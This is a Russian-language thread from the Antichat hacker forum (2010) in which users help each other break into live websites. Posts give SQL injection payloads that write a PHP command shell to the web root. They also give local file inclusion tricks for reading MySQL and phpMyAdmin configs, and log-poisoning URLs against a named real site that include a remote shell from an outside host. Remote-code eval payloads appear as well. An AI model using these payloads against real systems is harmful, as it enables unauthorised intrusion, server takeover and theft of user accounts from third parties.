ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13291  
Старый 20.05.2010, 00:39
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Saiga  
в /var/lib/mysql/ipw18/www/ нельзя делать запись.
(Can't create/write to file '/var/lib/mysql/ipw18/www/2.php' (Errcode: 2)
Конечно туда "нельзя делать запись". Ведь этой диры нету, и (Errcode: 2) как раз об этом говорит тебе.

Было-бы удивительно если-бы она там оказалась =\

С каких дел в дирректории мускула какой-то мудак будет размещать веб? Где ты берёшь эти чудопути?

Последний раз редактировалось Jokester; 20.05.2010 в 00:41..
 
Ответить с цитированием

  #13292  
Старый 20.05.2010, 02:01
Аватар для Saiga
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

To Konqi , спс !

To Jokester

короче
сделал запрос : union+select+@@datadir+--+

в ответ мне выдало :
/var/lib/mysql/ipw18/

-----------
вот с чего я начал :union+select+version()+into+outfile+'/tmp/1.txt+--+
мне выдало :
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /hermes/bosweb/web292/b2929/ipw.****(site name **/public_html/****(site name **/code/page_functions.php on line 40

дальше: union+select+load_file('/tmp/1.txt')+--+
мне выдало : version 5.............
-------------

к чему я это все, каким образом мне узнать директорию куда надо залить шелл для его чтения в виде site.ru/shell?cmd=dir .... ну или как поступить ?

не ругайся насяльника Jokester

Последний раз редактировалось Saiga; 20.05.2010 в 02:03..
 
Ответить с цитированием

  #13293  
Старый 20.05.2010, 02:18
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

/hermes/bosweb/web292/b2929/ipw.****(site name **/public_html/****(site name **/
вот сам же полный путь и скрыл значить в курсе что это путь до веба ? ))
 
Ответить с цитированием

  #13294  
Старый 20.05.2010, 02:20
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

короче если сделаешь так
union+select+version()+into+outfile+"/hermes/bosweb/web292/b2929/ipw.****(site name **/public_html/****(site name **/version.txt"+--+
если есть права на запись , если нет ищи другие папки
то в вебе можешь вызвать site.com/version.txt и все
а вместо этого файла можешь залить полноценный шелл ....
======
допустим название твоего сайта XXXL.com
тогда делаем так
+and+1=0+Union+Select+NULL,NULL,NULL,NULL"<? system($_REQUEST['cmd']); ?>",NULL,NULL+INTO+OUTFILE "/hermes/bosweb/web292/b2929/XXXL.com/public_html/XXXL.com/shell.php"
после вызовем
www.XXXL.com/shell.php?cmd=dir или ls смотря какая ОС

Последний раз редактировалось shell_c0de; 20.05.2010 в 04:25..
 
Ответить с цитированием

  #13295  
Старый 20.05.2010, 02:48
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

shell_c0de
Синтаксис только поправь в запросах (кавычки и слеши), а то он так никогда не разберётся

И да, ось там разумеется unixlike, это по путям видно
 
Ответить с цитированием

  #13296  
Старый 20.05.2010, 03:38
Аватар для Virologist
Virologist
Новичок
Регистрация: 07.05.2010
Сообщений: 5
Провел на форуме:
47678

Репутация: 5
По умолчанию

Как заинклюдить через LFI конфиги phpmyadmin и/или CPanel, что бы посмотреть акки пользователей. Возможно такое?
 
Ответить с цитированием

  #13297  
Старый 20.05.2010, 04:17
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

Цитата:
Сообщение от Virologist  
Как заинклюдить через LFI конфиги phpmyadmin и/или CPanel, что бы посмотреть акки пользователей. Возможно такое?
Если есть (LFI) инклуд попробуй просто залить шелл и через него посмотреть скрипты/конфиги вариантов много ...
а так прочитай конфиги
/var/lib/mysql/my.cnf
/etc/mysql/my.cnf
/etc/my.cnf
или дефолтные пути ПМА
Код:
/phpm/ 
/phpmy/ 
/phpmyadmin/ 
/PMA/ 
/mysql/ 
/admin/ 
/db/ 
/dbadmin/ 
/web/phpMyAdmin/ 
/admin/pma/ 
/admin/phpmyadmin/ 
/admin/mysql/ 
/phpmyadmin2/ 
/mysqladmin/ 
/mysql-admin/ 
/phpMyAdmin-2.5.6/
для начало просто инклуди индекс и смотри что куда инклудится в скриптах и про /proc/self/environ не забудь прочитать
 
Ответить с цитированием

  #13298  
Старый 20.05.2010, 04:51
Аватар для Virologist
Virologist
Новичок
Регистрация: 07.05.2010
Сообщений: 5
Провел на форуме:
47678

Репутация: 5
По умолчанию

Изначально пытался залить шелл через /proc/self/environ и User Agent, пробовал по разному через system и copy облом, только одним способом получилось просмотреть корневую директорию <?eval(file_get_contents('http://********.ru/1.txt'));?>, а при попытке перехода или открытия файла кидает на 404 страницу, вообще я понимаю из за чего это происходит. Должно быть так index.php?e=eval(file_get_contents('http://********.ru/1.txt')); но как это сделать если я вставляю код через User Agent. Вообще у меня мало опыта может я что то упустил

Последний раз редактировалось Virologist; 20.05.2010 в 04:59..
 
Ответить с цитированием

  #13299  
Старый 20.05.2010, 18:00
Аватар для 547
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

всем привет!
случай такой,есть инклуд файлов,
http://www.aiesec-berlin.de/KDK/index.php?load=file
вот вроде как найшел error_logs причем они одинаковые..
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6

удалось впихнуть в них свой код:
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6%00<? include('http://shell.narod.ru/testing.php');?>

в ответ в логах вижу это:
http://shell.narod.ru/testing.php => `testing.php' Resolving shell.narod.ru... 213.180.199.41 Connecting to shell.narod.ru|213.180.199.41|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 23,104 (23K) [application/octet-stream] testing.php: Permission denied Cannot write to `testing.php' (Permission denied)
 
Ответить с цитированием

  #13300  
Старый 20.05.2010, 19:51
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

ребят есть сайтег,в общем restore базы phpbb => как всегда profile.php?mode=editprofile&cmd=phpinfo();

интересно то что несколько раз мне нормально выдал phpinfo, а вот сейчас делаю тот же запрос но идет редирект на index.php, или на какой то другой скрипт(vraag.php?url=profile_data.php)

подскажите с чем это может быть связано,что profile.php не работает..

Последний раз редактировалось Konqi; 20.05.2010 в 20:31..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ